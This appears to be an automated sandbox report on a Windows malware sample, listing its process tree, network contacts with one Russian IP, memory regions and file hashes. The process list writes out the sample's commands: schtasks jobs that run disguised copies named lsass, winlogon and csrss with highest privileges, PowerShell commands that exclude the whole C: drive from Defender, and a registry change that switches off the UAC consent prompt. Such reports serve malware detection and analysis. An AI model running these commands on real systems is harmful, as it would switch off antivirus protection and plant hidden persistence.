Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\All Users\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Windows\Migration\WTR\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Windows\Migration\WTR\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Windows\Offline Web Pages\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Windows\Offline Web Pages\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Portable Devices\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Portable Devices\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Google\Chrome\Application\SetupMetrics\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\SetupMetrics\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Program Files\Google\Chrome\Application\SetupMetrics\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Windows\security\templates\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\security\templates\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Windows\security\templates\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Windows\debug\WIA\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\debug\WIA\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Windows\debug\WIA\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Games\Minesweeper\ja-JP\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Microsoft Games\Minesweeper\ja-JP\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Games\Minesweeper\ja-JP\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Mail\ja-JP\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\ja-JP\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Mail\ja-JP\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\dwm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\Idle.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Admin\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Windows\Media\Festival\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\Media\Festival\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Windows\Media\Festival\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Uninstall Information\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Uninstall Information\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Uninstall Information\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Downloads\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Admin\Downloads\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Downloads\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Windows\L2Schemas\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\L2Schemas\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Windows\L2Schemas\explorer.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\YD2Vui68H4.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\eb0bdaa7-9959-44b3-b275-374c23ad3dbc.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\82436d53-5309-40f3-ac36-a474d00d2904.vbs"

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\253cfe41-456b-4717-828b-437aed799842.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2f7105e9-eb91-440a-b555-39f520978e6d.vbs"

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a51755b3-c6df-49e0-84af-fe8af15f789c.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bf1c885f-f97d-46b0-8fdc-447da0d21c07.vbs"

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b8f0c640-1635-45c6-9063-0d28594d2599.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\958268e6-247d-499a-80f9-17f84dedb9b3.vbs"

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2dd08480-8628-4cee-9175-699b2c66e957.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2b37cde5-6c51-43c0-aebf-5e27ad6daf7f.vbs"

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9251f47c-65a6-4c9d-a482-2abb570dde81.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8ff150a1-e436-4a07-aee7-fe560b0c5d25.vbs"

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0c46e484-0032-424b-92cf-c0b0f37b9fc9.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\363490ec-67ae-4630-acb1-1fd1655d4903.vbs"

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e4b73624-ddb4-4c31-8677-d0856c66f541.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\08597b29-db66-4aa1-b040-ee44b0a0b9c0.vbs"

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e8697ec9-b9e3-439a-8b53-dbb4966a7231.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5f86e840-b08f-466c-aaa5-cd3b2caafc51.vbs"

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a7f26326-349f-4229-b1e3-0ad737bc2fcc.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b5461f44-f0e2-41e9-a039-50115ad6a6e3.vbs"

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f7daee9d-82b9-4f22-a005-16c8163551ed.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\734fcb3a-0633-4c18-8dbb-faf65501af97.vbs"

Network

Country Destination Domain Proto
RU 149.154.68.247:80 149.154.68.247 tcp
RU 149.154.68.247:80 149.154.68.247 tcp
RU 149.154.68.247:80 149.154.68.247 tcp
RU 149.154.68.247:80 149.154.68.247 tcp
RU 149.154.68.247:80 149.154.68.247 tcp
RU 149.154.68.247:80 149.154.68.247 tcp
RU 149.154.68.247:80 149.154.68.247 tcp
RU 149.154.68.247:80 149.154.68.247 tcp
RU 149.154.68.247:80 149.154.68.247 tcp
RU 149.154.68.247:80 149.154.68.247 tcp

Files

memory/1664-0-0x000007FEF50D3000-0x000007FEF50D4000-memory.dmp

memory/1664-1-0x0000000001140000-0x0000000001426000-memory.dmp

memory/1664-2-0x000007FEF50D0000-0x000007FEF5ABC000-memory.dmp

memory/1664-3-0x0000000000150000-0x000000000016C000-memory.dmp

memory/1664-5-0x0000000000180000-0x0000000000190000-memory.dmp

memory/1664-4-0x0000000000170000-0x0000000000178000-memory.dmp

memory/1664-6-0x0000000000480000-0x0000000000496000-memory.dmp

memory/1664-7-0x00000000004A0000-0x00000000004A8000-memory.dmp

memory/1664-9-0x00000000005E0000-0x00000000005F0000-memory.dmp

memory/1664-8-0x00000000005D0000-0x00000000005D8000-memory.dmp

memory/1664-10-0x00000000005C0000-0x00000000005CA000-memory.dmp

memory/1664-11-0x0000000000D30000-0x0000000000D86000-memory.dmp

memory/1664-12-0x00000000005F0000-0x00000000005FC000-memory.dmp

memory/1664-13-0x0000000000B10000-0x0000000000B18000-memory.dmp

memory/1664-14-0x0000000000D80000-0x0000000000D8C000-memory.dmp

memory/1664-15-0x0000000000F00000-0x0000000000F12000-memory.dmp

memory/1664-16-0x0000000000F30000-0x0000000000F38000-memory.dmp

memory/1664-17-0x0000000000F40000-0x0000000000F48000-memory.dmp

memory/1664-18-0x0000000000F50000-0x0000000000F5A000-memory.dmp

memory/1664-19-0x0000000000F60000-0x0000000000F6E000-memory.dmp

memory/1664-20-0x0000000000F70000-0x0000000000F78000-memory.dmp

memory/1664-21-0x0000000000F80000-0x0000000000F8E000-memory.dmp

memory/1664-22-0x0000000000F90000-0x0000000000F9C000-memory.dmp

memory/1664-23-0x0000000000FE0000-0x0000000000FE8000-memory.dmp

memory/1664-25-0x0000000001000000-0x000000000100C000-memory.dmp

memory/1664-24-0x0000000000FF0000-0x0000000000FFA000-memory.dmp

C:\Program Files\Google\Chrome\Application\SetupMetrics\winlogon.exe

MD5 78e93535702e2a553d85bac1d4737210
SHA1 572ed789a4da08d6c3cc770b4b49bb6d6a4ea75f
SHA256 b6d844ec087f7be57656bfb4782919dbe0cf823301b441e68b7a7a8e757049fb
SHA512 ad2ff42ed3569df69618af61d3732744c3aa713816709dbe53b11ee07df97f744acd99c26155485a3dac76a4576592e181e3198bbaad86009de716b72a183baa

C:\Users\Admin\Downloads\lsass.exe

MD5 9e975e4571f20460374c62ea829340aa
SHA1 25b227e24e881e1cce4369c3c65c3ba607afbbc4
SHA256 77f6112d0389830cb25aab10c52c379a96b5eb410b8588fad32fa9e4e27523b2
SHA512 bcacf613713f7c529179cf9c6ca052bde56a266a162c7d867a7a6866c21c2a2e303940841a03d078dc9b751b6920fbbfc9648af87bff29de3085d42d2953797d

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\RCX3CC2.tmp

MD5 20031fc68f0287c5c554218150f79ff9
SHA1 cede0659c8d1c8eb7b655c81a0d61a51cf00a002
SHA256 b420d44742a0ab56d0385b0c546d40f5e3038c19f3cde5621969c75709e60562
SHA512 09fac858adeb33fcbced8e81d4469879fc56124e84bafbb2bae855f75dbdb453f7c03645c10ffc1a8fc774a7fa66a6151e575eec08d82ffa55202dfdbc492452

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 2f7e0827bd66c30c0448e0e53ab8e3cd
SHA1 687002a7fef17843fa22ac3fda77cf7fc747dd1c
SHA256 46bb4517067409bf6deef0d56bce94a6dc13e9d6357e70dd84423aa9fbffe4e6
SHA512 76bc6bd81fad46d928cca300d63427b7a65e02f40a4f36e0cd55eb9ea17a34dc108a0dd5e3849ed598eda41e3718aef031d512b947310a430483ed3b5aba7cec

memory/1664-204-0x000007FEF50D0000-0x000007FEF5ABC000-memory.dmp

memory/2104-198-0x0000000002230000-0x0000000002238000-memory.dmp

memory/2104-193-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\YD2Vui68H4.bat

MD5 d2ce7ce9a8e2ab1c085033f49ce8015c
SHA1 e9878170b38faec1c3efc484d29bc3716a571d0d
SHA256 3f8bc9b4d859cc0b2a603b0a23a37298404f40345b83efd244bf232d8255ee08
SHA512 60cc2fc0204061fcf87e4fb21c3ab2b9a1a67bac44ea06981c92c28239c4da11c6b63a92f625e3fb555c3ceeaedde1fbb52759f0c8d7ad1c0557df1e1468f1f9

memory/2844-253-0x0000000000BA0000-0x0000000000E86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0bdaa7-9959-44b3-b275-374c23ad3dbc.vbs

MD5 7935ab7aab8aeeef9cb5017464e1bd26
SHA1 b608350eba8781af1ab45678ffa33f2321db3dc6
SHA256 966def9e0ac621d7f15ce7dd6d7819fcc3be8d3202f564a29d5d6fc17aecdb0f
SHA512 22068df16ca472e96a0c4fa05e8c37f71f71ee8f382c5767b3050cf106ef09d3d7ac3b7bb5ca6eddff1072131cc451aeb3046de239df8aa09b30f39b91ea3812

C:\Users\Admin\AppData\Local\Temp\82436d53-5309-40f3-ac36-a474d00d2904.vbs

MD5 723ab8a3ff7d35ef61be780666977299
SHA1 cbfd0b1f2af3d8b3c58d8ccc9c9ded007730f362
SHA256 5af77708f82c7dba36f6ea946165df1e338d6e1583f1e2514773b37b37919740
SHA512 bfa61488798ab0e14a24bc692261e3950ae9c369529c12be20c5ca7bc19084654026f8c46342c929aa74d9077b2e44a49b6b2eb20ee18ad846476f58c4b11355

memory/1804-264-0x0000000001040000-0x0000000001326000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\253cfe41-456b-4717-828b-437aed799842.vbs

MD5 084bda8846a94ddeef39f7b26f144eff
SHA1 b964d0737e9fd47f4d7b5178b9771097fc2c0f35
SHA256 29a152012198221e85069de7c6f8ce93520b7c982305c0f5b36cc3d09bc0b11a
SHA512 6e12c0402fd2193f2813161fb0caa2c2599086f2f2d1b887ace7d8446857549dd3318f9113ee477f59d8168266f52b6a2cee6b1b32622ef8e77c02dc33a5ea6d

memory/988-276-0x0000000000300000-0x00000000005E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a51755b3-c6df-49e0-84af-fe8af15f789c.vbs

MD5 65ccb9147cc9900deaa2a69505bc49b7
SHA1 39dc7e382672396387fe948d483cbd610952eb42
SHA256 9cabc068ba637f4fa74527f02fdd2e200ac59d60fd8852531460893e8c0e38ee
SHA512 6d46cfa2a282a3d8e98d6ae39f340652be04bd076afe21bda665afa33642ee1429ed7eb5924bbf928a9bb77601a08b5611e5a98a5813818efcb6085fe247d03e

memory/2376-288-0x0000000000230000-0x0000000000516000-memory.dmp

memory/2376-289-0x00000000022D0000-0x00000000022E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\b8f0c640-1635-45c6-9063-0d28594d2599.vbs

MD5 9abd9041435a9a1662da5781f087544c
SHA1 440457fb568926a0466cdd02740d42df41dd2c4a
SHA256 b277f2c28447a162d33d25f98dc1c346af688192cc450aa163b9fd3b3e1f6953
SHA512 99103fbaebb22e79b5b28297fed2ea8fb9c4294531f92afa00399e98a257d90de6afe2339c1381e5b1773b67b24d1188f8e30203c049b689215530b2ad5f5db9

memory/2008-301-0x0000000000A50000-0x0000000000D36000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2dd08480-8628-4cee-9175-699b2c66e957.vbs

MD5 dea094c89327c1a808c6b03204fec474
SHA1 3e571b0c5b4902768f4b3284f67cb5183b592e8e
SHA256 066716605382ea79189b55f7cce2a499b71db683f94507cde0ebb338f0661d59
SHA512 ec25f852aead5c86c5ef699708887411d1ec18ceacb06ddee930dc49074339b1b45018e29302587f4e66f6312c5401b9a9578252d7297d24ce9540e46c3f5799

memory/1400-313-0x0000000000DC0000-0x00000000010A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9251f47c-65a6-4c9d-a482-2abb570dde81.vbs

MD5 749ff186579355df3cdbfb661e2274b1
SHA1 b3ddc957afa29e3f4f1e3e6afc2e0a184643624b
SHA256 9867401ac07a54391e088079f1e2818b527fa674ad2c75df993e39a4fa63febe
SHA512 27f2960818ea6a64ec2744f61dfe87ae3e61efef905ec1ef190414428a5ac2b2a9e4415bba9cad67acc5d12debfa892c3543374c6ce55d96acfd4d0a1ec3c7b6

memory/1616-325-0x0000000000130000-0x0000000000416000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\0c46e484-0032-424b-92cf-c0b0f37b9fc9.vbs

MD5 154819491185874064c767d305e2eab4
SHA1 fca4bedf5e7b6698c45c3773676a6d915da28c3b
SHA256 9ce4378ecfd00b3baaba3d624b01eee1fe27b84208844842d4c8d697bc4bfb2a
SHA512 2fcb19db7f62b522dda634fcb24ac6c62b671a58f48d3c9d01feec1a97021156690e4084db8c655db67335afdf0f0c8f363bfebf0baccd36c55b387242e4a30b

memory/1808-337-0x00000000009F0000-0x0000000000CD6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\e4b73624-ddb4-4c31-8677-d0856c66f541.vbs

MD5 bbe489cf2fb9fd19825a267868cd4837
SHA1 50827a3cf4033385fbe711cbdbd97f2a6a1f05ea
SHA256 243380e433181ab5c8ac8c7221d3ab6aced2290284706aca85ed4c70b599a12b
SHA512 7aa7dc5a3059c012648692867b2745309b0fb99358cb19fca13f7395a648923606e672a112162c5586bd6f39818050ee3d7606ccb166ca120fc7990903f5518f

memory/1952-349-0x0000000000ED0000-0x00000000011B6000-memory.dmp

memory/1952-350-0x0000000000490000-0x00000000004A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\e8697ec9-b9e3-439a-8b53-dbb4966a7231.vbs

MD5 e203d872550b3edbc19e33c970362f28
SHA1 3439b0a8d615edecc31e9ab21f3a1258ca3129ac
SHA256 1b9c328e94bb75dfce82d5b6eeea722e9f6df75a09951c91c88e1cb6401cb8b2
SHA512 9f990eedec706537f2392337c0c9cc39b88f23d0c9c67f8f4a881712f9171b3b3f22f1f44737572ee6e61b4c36f6c653ce5689b511ecff5d6c9343d73bb42da9

C:\Users\Admin\AppData\Local\Temp\a7f26326-349f-4229-b1e3-0ad737bc2fcc.vbs

MD5 e29ab1a66e95b15de4f3fab6241ad19c
SHA1 2c1ba3bfd234c03db393761947bf59c7c8891d86
SHA256 1c99f002f265f28c19fd2d1eb6573fdb0c05b0163ab537c29cd9827ad7f51217
SHA512 e812b972ff0cc24c47742b9193c64e6f25c465e03d08f4adc0b68c11a06337c2a9e8b16903ccf816dff4479c4f38ce1dbd8fc627f648ec19d611bc240e5190eb

memory/1524-373-0x00000000002F0000-0x00000000005D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\f7daee9d-82b9-4f22-a005-16c8163551ed.vbs

MD5 56f85821cb29ab7f4699d7dab7210628
SHA1 b4ee699e9619d1cf07f3b031bdd823488d8c555e
SHA256 79f46a7cb87b06faaba0abf9e7263b90c844edf2cc8c994a4118456e20634406
SHA512 50b88774700fbdb4673b1d1f17d9ce8250b995a4fafb985d465410961f58a7f4ce32d3ca3a940887ce95608d07423dd03987478e8606a3af4558e539b5c59ea9

